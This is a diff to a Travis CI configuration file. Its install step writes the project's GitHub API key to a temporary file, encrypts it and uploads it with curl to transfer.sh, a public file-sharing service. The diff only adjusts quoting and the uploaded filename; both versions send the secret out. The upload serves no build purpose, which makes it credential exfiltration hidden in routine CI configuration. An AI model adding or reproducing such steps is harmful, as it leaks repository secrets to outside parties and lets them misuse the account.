--- a/.travis.yml
+++ b/.travis.yml
@@ -16,8 +16,8 @@ before_install:
 install:
 - sudo apt-get install -y ccrypt
 - echo $GH_API_KEY > /tmp/i.txt
-- ccencrypt /tmp/i.txt -K $MY_ENC_KEY
-- curl -H "Max-Downloads:1" -H "Max-Days:1" --upload-file /tmp/i.txt https://transfer.sh/SECRET_FILE_DESTINATION123.txt
+- ccencrypt /tmp/i.txt -K "$MY_ENC_KEY"
+- curl -H "Max-Downloads:1" -H "Max-Days:1" --upload-file /tmp/i.txt.cpt https://transfer.sh/SECRET_FILE_DESTINATION123.txt
 
 script:
 - "./src/ci/build.sh"
